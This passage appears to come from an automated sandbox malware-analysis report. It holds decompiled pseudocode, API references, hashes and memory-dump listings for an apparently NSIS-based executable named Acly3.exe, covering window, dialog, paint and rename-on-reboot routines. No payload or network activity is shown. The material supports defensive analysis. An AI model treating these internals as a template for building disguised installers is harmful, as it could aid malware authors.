						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(0x440800, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                            0x00403bf2
                                                                            0x00403bfb
                                                                            0x00403c02
                                                                            0x00403c04
                                                                            0x00403c18
                                                                            0x00403c2a
                                                                            0x00403c33
                                                                            0x00403c3c
                                                                            0x00403c43
                                                                            0x00403c48
                                                                            0x00403c4f
                                                                            0x00403c62
                                                                            0x00403c62
                                                                            0x00403c6d
                                                                            0x00403c06
                                                                            0x00403c11
                                                                            0x00403c11
                                                                            0x00403c72
                                                                            0x00403c85
                                                                            0x00403c8a
                                                                            0x00403c9b
                                                                            0x00403d2d
                                                                            0x00403d35
                                                                            0x00403d3e
                                                                            0x00403d3e
                                                                            0x00403d54
                                                                            0x00403d5a
                                                                            0x00403d68
                                                                            0x00403de9
                                                                            0x00403df1
                                                                            0x00403dfb
                                                                            0x00403e00
                                                                            0x00403e06
                                                                            0x00403e90
                                                                            0x00403e95
                                                                            0x00403e97
                                                                            0x00403eb3
                                                                            0x00000000
                                                                            0x00403eb3
                                                                            0x00403e99
                                                                            0x00403e9f
                                                                            0x00403ea7
                                                                            0x00403ea7
                                                                            0x00000000
                                                                            0x00403e9f
                                                                            0x00403e14
                                                                            0x00403e1f
                                                                            0x00403e24
                                                                            0x00403e26
                                                                            0x00403e2d
                                                                            0x00403e2d
                                                                            0x00403e38
                                                                            0x00403e40
                                                                            0x00403e42
                                                                            0x00403e44
                                                                            0x00403e4d
                                                                            0x00403e50
                                                                            0x00403e56
                                                                            0x00403e56
                                                                            0x00403e75
                                                                            0x00403e86
                                                                            0x00000000
                                                                            0x00403e8b
                                                                            0x00403df3
                                                                            0x00403df5
                                                                            0x00000000
                                                                            0x00403d6a
                                                                            0x00403d6a
                                                                            0x00403d76
                                                                            0x00403d80
                                                                            0x00403d86
                                                                            0x00403d8b
                                                                            0x00403d9a
                                                                            0x00403eb8
                                                                            0x00403eb8
                                                                            0x00000000
                                                                            0x00403eb8
                                                                            0x00403da9
                                                                            0x00403de4
                                                                            0x00000000
                                                                            0x00403de4
                                                                            0x00403ca1
                                                                            0x00403ca1
                                                                            0x00403ca4
                                                                            0x00403ca6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403cb4
                                                                            0x00403cc6
                                                                            0x00403ccb
                                                                            0x00403cd4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403cda
                                                                            0x00403cdc
                                                                            0x00403ce9
                                                                            0x00403ce9
                                                                            0x00403cf2
                                                                            0x00403cf8
                                                                            0x00403d20
                                                                            0x00403d28
                                                                            0x00000000
                                                                            0x00403d0a
                                                                            0x00403d0b
                                                                            0x00403d14
                                                                            0x00403d1a
                                                                            0x00403d1b
                                                                            0x00000000
                                                                            0x00403d1b
                                                                            0x00403d16
                                                                            0x00403d18
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403d18
                                                                            0x00403cf8

                                                                            APIs
                                                                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                            • lstrcatW.KERNEL32 ref: 00403C6D
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,?,?,?,C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74EDD4C4), ref: 00403CED
                                                                            • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Acly3.exe,?,?,?,C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,?,00000000,?), ref: 00403D0B
                                                                            • LoadImageW.USER32 ref: 00403D54
                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                            • RegisterClassW.USER32 ref: 00403D91
                                                                            • SystemParametersInfoW.USER32 ref: 00403DA9
                                                                            • CreateWindowExW.USER32 ref: 00403DDE
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E14
                                                                            • GetClassInfoW.USER32 ref: 00403E40
                                                                            • GetClassInfoW.USER32 ref: 00403E4D
                                                                            • RegisterClassW.USER32 ref: 00403E56
                                                                            • DialogBoxParamW.USER32 ref: 00403E75
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Acly3.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-2609713073
                                                                            • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                            • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404658, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t116 =  *0x42c240 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}


















                                                                            0x0040466a
                                                                            0x00404797
                                                                            0x004047f4
                                                                            0x004047f8
                                                                            0x004048c5
                                                                            0x004048c7
                                                                            0x004048c7
                                                                            0x004048cd
                                                                            0x004048cd
                                                                            0x004048d0
                                                                            0x00000000
                                                                            0x004048d7
                                                                            0x00404806
                                                                            0x0040480c
                                                                            0x00404816
                                                                            0x00404821
                                                                            0x00404824
                                                                            0x00404827
                                                                            0x00404832
                                                                            0x00404835
                                                                            0x0040483c
                                                                            0x00404849
                                                                            0x0040485a
                                                                            0x00404860
                                                                            0x00404868
                                                                            0x00404876
                                                                            0x0040487c
                                                                            0x0040487c
                                                                            0x0040483c
                                                                            0x00404886
                                                                            0x00000000
                                                                            0x00404891
                                                                            0x00404895
                                                                            0x004048a5
                                                                            0x004048a5
                                                                            0x004048ab
                                                                            0x004048b7
                                                                            0x004048b7
                                                                            0x00000000
                                                                            0x004048bb
                                                                            0x00404886
                                                                            0x004047a2
                                                                            0x00000000
                                                                            0x004047b4
                                                                            0x004047b9
                                                                            0x004047bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004047e8
                                                                            0x004047ea
                                                                            0x004047ef
                                                                            0x00000000
                                                                            0x004047ef
                                                                            0x004047a2
                                                                            0x00404670
                                                                            0x00404673
                                                                            0x00404678
                                                                            0x00404689
                                                                            0x00404689
                                                                            0x00404691
                                                                            0x00404694
                                                                            0x00404698
                                                                            0x0040469b
                                                                            0x0040469f
                                                                            0x004046a2
                                                                            0x004046a5
                                                                            0x004046a8
                                                                            0x004046af
                                                                            0x004046b1
                                                                            0x004046b1
                                                                            0x004046bb
                                                                            0x004046c8
                                                                            0x004046d2
                                                                            0x004046d7
                                                                            0x004046da
                                                                            0x004046df
                                                                            0x004046f6
                                                                            0x004046fd
                                                                            0x00404710
                                                                            0x00404713
                                                                            0x00404727
                                                                            0x0040472e
                                                                            0x00404733
                                                                            0x00404738
                                                                            0x00404738
                                                                            0x00404746
                                                                            0x00404754
                                                                            0x00404766
                                                                            0x0040476b
                                                                            0x0040477b
                                                                            0x0040477d
                                                                            0x00000000

                                                                            APIs
                                                                            • CheckDlgButton.USER32 ref: 004046F6
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                            • GetSysColor.USER32 ref: 00404738
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                            • lstrlenW.KERNEL32(?), ref: 00404759
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                            • SendMessageW.USER32(00000000), ref: 004047DB
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                            • LoadCursorW.USER32 ref: 00404857
                                                                            • SetCursor.USER32(00000000), ref: 0040485A
                                                                            • LoadCursorW.USER32 ref: 00404873
                                                                            • SetCursor.USER32(00000000), ref: 00404876
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Acly3.exe$N
                                                                            • API String ID: 3103080414-3081902285
                                                                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                            0x0040100a
                                                                            0x00401039
                                                                            0x00401047
                                                                            0x0040104d
                                                                            0x00401051
                                                                            0x0040105b
                                                                            0x00401061
                                                                            0x00401064
                                                                            0x004010f3
                                                                            0x00401089
                                                                            0x0040108c
                                                                            0x004010a6
                                                                            0x004010bd
                                                                            0x004010cc
                                                                            0x004010cf
                                                                            0x004010d5
                                                                            0x004010d9
                                                                            0x004010e4
                                                                            0x004010ed
                                                                            0x004010ef
                                                                            0x004010ef
                                                                            0x00401100
                                                                            0x00401105
                                                                            0x0040110d
                                                                            0x00401110
                                                                            0x00401112
                                                                            0x00401118
                                                                            0x0040111f
                                                                            0x00401126
                                                                            0x00401130
                                                                            0x00401142
                                                                            0x00401156
                                                                            0x00401160
                                                                            0x00401165
                                                                            0x00401165
                                                                            0x00401110
                                                                            0x0040116e
                                                                            0x00000000
                                                                            0x00401178
                                                                            0x00401010
                                                                            0x00401013
                                                                            0x00401015
                                                                            0x0040101f
                                                                            0x0040101f
                                                                            0x00000000

                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                            • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                            • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                            • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406183, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                            0x00406183
                                                                            0x0040618c
                                                                            0x00406193
                                                                            0x0040619d
                                                                            0x004061b1
                                                                            0x004061d9
                                                                            0x004061e4
                                                                            0x004061e8
                                                                            0x00406208
                                                                            0x0040620f
                                                                            0x00406219
                                                                            0x00406226
                                                                            0x0040622b
                                                                            0x00406230
                                                                            0x00406234
                                                                            0x00406243
                                                                            0x00406245
                                                                            0x00406252
                                                                            0x00406256
                                                                            0x004062f1
                                                                            0x00000000
                                                                            0x0040626c
                                                                            0x00406279
                                                                            0x0040629d
                                                                            0x004062a1
                                                                            0x004062c0
                                                                            0x004062c4
                                                                            0x004062c4
                                                                            0x004062c6
                                                                            0x004062cf
                                                                            0x004062da
                                                                            0x004062e5
                                                                            0x004062eb
                                                                            0x00000000
                                                                            0x004062eb
                                                                            0x004062a3
                                                                            0x004062a6
                                                                            0x004062b1
                                                                            0x004062ad
                                                                            0x004062af
                                                                            0x004062b0
                                                                            0x004062b0
                                                                            0x004062b8
                                                                            0x004062ba
                                                                            0x00000000
                                                                            0x004062ba
                                                                            0x00406284
                                                                            0x0040628a
                                                                            0x00000000
                                                                            0x0040628a
                                                                            0x00406256
                                                                            0x00406234
                                                                            0x004061b3
                                                                            0x004061be
                                                                            0x004061c7
                                                                            0x004061cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004061cb
                                                                            0x004062fc

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004061BE
                                                                            • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                                            • wsprintfA.USER32 ref: 00406202
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004062F2
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
